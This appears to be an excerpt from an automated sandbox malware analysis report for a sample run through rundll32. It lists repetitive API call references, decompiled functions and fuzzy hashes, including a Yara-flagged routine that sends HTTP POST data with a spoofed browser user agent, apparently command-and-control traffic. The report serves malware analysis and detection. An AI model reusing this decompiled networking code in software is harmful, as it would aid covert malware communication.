                                            • AddFontResourceW.GDI32(00192D44), ref: 001926A5
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926AF
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926B9
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926C3
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926CD
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926D7
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926E1
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926EB
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926F5
                                            • AddFontResourceW.GDI32(00192D44), ref: 001926FF
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192709
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192713
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019271D
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192727
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192731
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019273B
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192745
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019274F
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192759
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192763
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019276D
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192777
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192781
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019278B
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192795
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019279F
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927A9
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927B3
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927BD
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927C7
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927D1
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927DB
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927E5
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927EF
                                            • AddFontResourceW.GDI32(00192D44), ref: 001927F9
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192803
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019280D
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192817
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192821
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019282B
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192835
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019283F
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192849
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192853
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019285D
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192867
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192871
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019287B
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192885
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019288F
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192899
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928A3
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928AD
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928B7
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928C1
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928CB
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928D5
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928DF
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928E9
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928F3
                                            • AddFontResourceW.GDI32(00192D44), ref: 001928FD
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192907
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192911
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019291B
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192925
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019292F
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192939
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192943
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019294D
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192957
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192961
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019296B
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192975
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019297F
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192989
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192993
                                            • AddFontResourceW.GDI32(00192D44), ref: 0019299D
                                            • AddFontResourceW.GDI32(00192D44), ref: 001929A7
                                            • AddFontResourceW.GDI32(00192D44), ref: 001929B1
                                            • AddFontResourceW.GDI32(00192D44), ref: 001929BB
                                            • AddFontResourceW.GDI32(00192D44), ref: 001929C5
                                            • LoadCursorA.USER32 ref: 001929D1
                                            • LoadCursorA.USER32 ref: 001929F3
                                            • LoadCursorA.USER32 ref: 00192A01
                                            • LoadCursorA.USER32 ref: 00192A0F
                                            • LoadCursorA.USER32 ref: 00192A1D
                                            • LoadCursorA.USER32 ref: 00192A2B
                                            • LoadCursorA.USER32 ref: 00192A39
                                            • LoadCursorA.USER32 ref: 00192A47
                                            • LoadCursorA.USER32 ref: 00192A55
                                            • LoadCursorA.USER32 ref: 00192A63
                                            • LoadCursorA.USER32 ref: 00192A71
                                            • LoadCursorA.USER32 ref: 00192A7F
                                            • LoadCursorA.USER32 ref: 00192A8D
                                            • LoadCursorA.USER32 ref: 00192A9B
                                            • LoadCursorA.USER32 ref: 00192AA9
                                            • LoadCursorA.USER32 ref: 00192AB7
                                            • LoadCursorA.USER32 ref: 00192AC5
                                            • LoadCursorA.USER32 ref: 00192AD3
                                            • LoadCursorA.USER32 ref: 00192AE1
                                            • LoadCursorA.USER32 ref: 00192AEF
                                            • LoadCursorA.USER32 ref: 00192AFD
                                            • LoadCursorA.USER32 ref: 00192B0B
                                            • LoadCursorA.USER32 ref: 00192B19
                                            • LoadCursorA.USER32 ref: 00192B27
                                            • LoadCursorA.USER32 ref: 00192B35
                                            • LoadCursorA.USER32 ref: 00192B43
                                            • LoadCursorA.USER32 ref: 00192B51
                                            • LoadCursorA.USER32 ref: 00192B5F
                                            • LoadCursorA.USER32 ref: 00192B6D
                                            • LoadCursorA.USER32 ref: 00192B7B
                                            • LoadCursorA.USER32 ref: 00192B89
                                            • LoadCursorA.USER32 ref: 00192B97
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BAA
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BB4
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BBE
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BC8
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BD2
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BDC
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BE6
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BF0
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192BFA
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C04
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C0E
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C18
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C22
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C2C
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C36
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C40
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C4A
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C54
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C5E
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C68
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C72
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C7C
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C86
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C90
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192C9A
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CA4
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CAE
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CB8
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CC2
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CCC
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CD6
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CE0
                                            • AddFontResourceW.GDI32(00192D44), ref: 00192CEA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: FontResource$CursorLoad$DeleteFileMetaNameObjectUser$AllocVirtual
                                            • String ID: rrrrr${
                                            • API String ID: 4043527058-2199886882
                                            • Opcode ID: 11db343b1550c37be2ed7cd8cd3759bc56956f30d83a2b4490fb7b42f8cded01
                                            • Instruction ID: c45fedb27b011610254bddc63a94c4fdb1d44e940ef9d98aa547d597c784ef1b
                                            • Opcode Fuzzy Hash: 11db343b1550c37be2ed7cd8cd3759bc56956f30d83a2b4490fb7b42f8cded01
                                            • Instruction Fuzzy Hash: 341274626C4B45BEFB04B7E4DC83A9D76E2DB35F02F608011F1446AAE6DBF046854F22
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00184A34, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184registrystringlibraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            C-Code - Quality: 65%
                                            			E00184A34(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x184b39);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E0018487C( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00184CA0, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E00184B40);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00181200();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00181208();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00181200();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00181200();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00181200();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                            0x00184a35
                                            0x00184a37
                                            0x00184a3f
                                            0x00184a50
                                            0x00184a55
                                            0x00184a6e
                                            0x00184a75
                                            0x00184ab7
                                            0x00184ab9
                                            0x00184aba
                                            0x00184abf
                                            0x00184ac2
                                            0x00184ac5
                                            0x00184ad7
                                            0x00184afa
                                            0x00184b1a
                                            0x00184b1a
                                            0x00184b1e
                                            0x00184b24
                                            0x00184b27
                                            0x00184b2a
                                            0x00184b38
                                            0x00184a77
                                            0x00184a8c
                                            0x00184a93
                                            0x00000000
                                            0x00184a95
                                            0x00184aaa
                                            0x00184ab1
                                            0x00184b40
                                            0x00184b48
                                            0x00184b4f
                                            0x00184b50
                                            0x00184b63
                                            0x00184b68
                                            0x00184b71
                                            0x00184b87
                                            0x00184b8d
                                            0x00184b8e
                                            0x00184b9b
                                            0x00184ba0
                                            0x00184b9f
                                            0x00184b9f
                                            0x00184baf
                                            0x00184bb7
                                            0x00184bbd
                                            0x00184bc2
                                            0x00184bcf
                                            0x00184bd3
                                            0x00184bd4
                                            0x00184bd5
                                            0x00184bea
                                            0x00184bea
                                            0x00184bee
                                            0x00184c07
                                            0x00184c0b
                                            0x00184c0c
                                            0x00184c0d
                                            0x00184c1d
                                            0x00184c22
                                            0x00184c26
                                            0x00184c28
                                            0x00184c3d
                                            0x00184c41
                                            0x00184c42
                                            0x00184c43
                                            0x00184c53
                                            0x00184c58
                                            0x00184c58
                                            0x00184c26
                                            0x00184bee
                                            0x00184bb7
                                            0x00184c61
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00184ab1
                                            0x00184a93

                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,01FD0A4C,0019309C), ref: 00184A50
                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,01FD0A4C,0019309C), ref: 00184A6E
                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,01FD0A4C,0019309C), ref: 00184A8C
                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00184AAA
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00184AF3
                                            • RegQueryValueExA.ADVAPI32(?,00184CA0,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00184B39,?,80000001), ref: 00184B11
                                            • RegCloseKey.ADVAPI32(?,00184B40,00000000,?,?,00000000,00184B39,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00184B33
                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00184B50
                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00184B5D
                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00184B63
                                            • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00184B8E
                                            • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00184BD5
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00184BE5
                                            • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00184C0D
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00184C1D
                                            • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00184C43
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 00184C53
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                            • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                            • API String ID: 1759228003-3917250287
                                            • Opcode ID: 248188c0a6c007fdecbb14403866d3c373d37c622c768e8613ce63a3191c385b
                                            • Instruction ID: 5bbf229bff0086d69032d50d2e93fcba845d333eb2c22b743862bbef75746862
                                            • Opcode Fuzzy Hash: 248188c0a6c007fdecbb14403866d3c373d37c622c768e8613ce63a3191c385b
                                            • Instruction Fuzzy Hash: 20518572A4021D7BFB21EAE49C46FEFB7AD9B14740F5001A1BA04E6181EB74DF458FA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C28D0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 188stringnetworkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            C-Code - Quality: 100%
                                            			E001C28D0(char* _a4, CHAR* _a8, void* _a12, intOrPtr _a16, DWORD* _a20) {
				void* _v8;
				void* _v12;
				signed short _v16;
				signed int _v20;
				void _v24;
				void _v28;
				void* _v32;
				int _v36;
				long _v40;
				int _v44;
				int _v48;
				long _v52;
				intOrPtr _v64;
				char* _v68;
				signed short _v88;
				intOrPtr _v92;
				char* _v96;
				long _v100;
				void* _v112;
				char _v372;
				char _v632;
				void* _t86;
				int _t90;
				int _t100;
				void* _t145;

				E001C14A0( &_v112, 0, 0x3c);
				_v112 = 0x3c;
				_v96 =  &_v372;
				_v92 = 0x104;
				_v68 =  &_v632;
				_v64 = 0x104;
				_v36 = 0;
				_v44 = lstrlenA("Content-Type: application/x-www-form-urlencoded");
				 *((char*)(_t145 + 0xfffffffffffffe90)) = 0;
				 *((char*)(_t145 + 0xfffffffffffffd8c)) = 0;
				if(_a8 != 0) {
					_v36 = lstrlenA(_a8);
				}
				if(InternetCrackUrlA(_a4, 0, 0,  &_v112) != 0) {
					if(_v100 == 0) {
						_v100 = 3;
					}
					if(_v100 == 3 || _v100 == 4) {
						_v32 = E001C24F0();
						if(_v32 != 0) {
							_v16 = _v88;
							_v20 = 0x84080100;
							if(_v100 == 4) {
								_v20 = _v20 | 0x00803000;
							}
							_t86 = InternetConnectA(_v32,  &_v372, _v16 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
							_v12 = _t86;
							if(_v12 != 0) {
								_v8 = HttpOpenRequestA(_v12, "POST",  &_v632, 0, 0, 0x1c7048, _v20, 0);
								if(_v8 != 0) {
									if(_v100 == 4) {
										_v40 = 4;
										InternetQueryOptionA(_v8, 0x1f,  &_v24,  &_v40);
										_v24 = _v24 | 0x00001100;
										InternetSetOptionA(_v8, 0x1f,  &_v24, 4);
									}
									_t90 = HttpSendRequestA(_v8, "Content-Type: application/x-www-form-urlencoded", _v44, _a8, _v36); // executed
									_v48 = _t90;
									_v28 = 0;
									if(_v48 == 1) {
										_v52 = 4;
										HttpQueryInfoA(_v8, 0x20000013,  &_v28,  &_v52, 0);
										if(_v28 == 0xc8 && _a12 != 0) {
											_t100 = InternetReadFile(_v8, _a12, _a16 - 1, _a20); // executed
											if(_t100 == 0 ||  *_a20 <= 0) {
												 *_a20 = 0;
											} else {
												 *((char*)(_a12 +  *_a20)) = 0;
											}
										}
									}
									InternetCloseHandle(_v8);
									InternetCloseHandle(_v12);
									if(_v28 != 0xc8) {
										return 0;
									} else {
										return 1;
									}
								}
								InternetCloseHandle(_v12);
								return 0;
							} else {
								return 0;
							}
						}
						return 0;
					} else {
						return 0;
					}
				}
				return 0;
			}




























                                            0x001c28e1
                                            0x001c28e9
                                            0x001c28f6
                                            0x001c28f9
                                            0x001c2906
                                            0x001c2909
                                            0x001c2910
                                            0x001c2922
                                            0x001c292d
                                            0x001c293d
                                            0x001c2949
                                            0x001c2955
                                            0x001c2955
                                            0x001c296c
                                            0x001c2979
                                            0x001c297b
                                            0x001c297b
                                            0x001c2986
                                            0x001c299a
                                            0x001c29a1
                                            0x001c29ae
                                            0x001c29b2
                                            0x001c29bd
                                            0x001c29c8
                                            0x001c29c8
                                            0x001c29e5
                                            0x001c29eb
                                            0x001c29f2
                                            0x001c2a20
                                            0x001c2a27
                                            0x001c2a3e
                                            0x001c2a40
                                            0x001c2a55
                                            0x001c2a64
                                            0x001c2a73
                                            0x001c2a73
                                            0x001c2a8e
                                            0x001c2a94
                                            0x001c2a97
                                            0x001c2aa2
                                            0x001c2aa4
                                            0x001c2abe
                                            0x001c2acb
                                            0x001c2ae6
                                            0x001c2aee
                                            0x001c2b09
                                            0x001c2af8
                                            0x001c2b00
                                            0x001c2b00
                                            0x001c2aee
                                            0x001c2acb
                                            0x001c2b13
                                            0x001c2b1d
                                            0x001c2b2a
                                            0x00000000
                                            0x001c2b2c
                                            0x00000000
                                            0x001c2b2c
                                            0x001c2b2a
                                            0x001c2a2d
                                            0x00000000
                                            0x001c29f4
                                            0x00000000
                                            0x001c29f4
                                            0x001c29f2
                                            0x00000000
                                            0x001c298e
                                            0x00000000
                                            0x001c298e
                                            0x001c2986
                                            0x00000000

                                            APIs
                                            • lstrlenA.KERNEL32(Content-Type: application/x-www-form-urlencoded), ref: 001C291C
                                            • lstrlenA.KERNEL32(00000000), ref: 001C294F
                                              • Part of subcall function 001C24F0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 001C2509
                                            • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 001C2964
                                            • InternetConnectA.WININET(00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000), ref: 001C29E5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$lstrlen$ConnectCrackOpen
                                            • String ID: <$Content-Type: application/x-www-form-urlencoded$POST
                                            • API String ID: 4167639401-2842678110
                                            • Opcode ID: fab0480aefc9cb0db986b29a2591a64ac491b1640b691a0cba3d9f39c70d45cb
                                            • Instruction ID: 5d51aeca5bc3d052b8d7fa0451864f58e0981a0d1728caa4486b82a16e57dddb
                                            • Opcode Fuzzy Hash: fab0480aefc9cb0db986b29a2591a64ac491b1640b691a0cba3d9f39c70d45cb
                                            • Instruction Fuzzy Hash: 3B712A71A04209EFEB14DFA4CD59FEEBBB5BB68704F104529E605AB280D774DA84CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00184B40, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98stringlibrarythreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 122 184b40-184b71 lstrcpyn GetThreadLocale GetLocaleInfoA 123 184c5a-184c61 122->123 124 184b77-184b7b 122->124 125 184b7d-184b81 124->125 126 184b87-184b9d lstrlen 124->126 125->123 125->126 127 184ba0-184ba3 126->127 128 184baf-184bb7 127->128 129 184ba5-184bad 127->129 128->123 130 184bbd-184bc2 128->130 129->128 131 184b9f 129->131 132 184bec-184bee 130->132 133 184bc4-184bea lstrcpyn LoadLibraryExA 130->133 131->127 132->123 134 184bf0-184bf4 132->134 133->132 134->123 135 184bf6-184c26 lstrcpyn LoadLibraryExA 134->135 135->123 136 184c28-184c58 lstrcpyn LoadLibraryExA 135->136 136->123
                                            C-Code - Quality: 61%
                                            			E00184B40() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00181200();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00181208();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00181200();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00181200();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00181200();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                            0x00184b40
                                            0x00184b48
                                            0x00184b4f
                                            0x00184b50
                                            0x00184b63
                                            0x00184b68
                                            0x00184b71
                                            0x00184c5a
                                            0x00184c61
                                            0x00184b87
                                            0x00184b87
                                            0x00184b8d
                                            0x00184b8e
                                            0x00184b9b
                                            0x00184ba0
                                            0x00184ba3
                                            0x00184b9f
                                            0x00000000
                                            0x00184b9f
                                            0x00184baf
                                            0x00184bb7
                                            0x00184bbd
                                            0x00184bc2
                                            0x00184bcf
                                            0x00184bd3
                                            0x00184bd4
                                            0x00184bd5
                                            0x00184bea
                                            0x00184bea
                                            0x00184bee
                                            0x00184c07
                                            0x00184c0b
                                            0x00184c0c
                                            0x00184c0d
                                            0x00184c1d
                                            0x00184c22
                                            0x00184c26
                                            0x00184c28
                                            0x00184c3d
                                            0x00184c41
                                            0x00184c42
                                            0x00184c43
                                            0x00184c53
                                            0x00184c58
                                            0x00184c58
                                            0x00184c26
                                            0x00184bee
                                            0x00000000
                                            0x00184bb7

                                            APIs
                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00184B50
                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00184B5D
                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00184B63
                                            • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00184B8E
                                            • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00184BD5
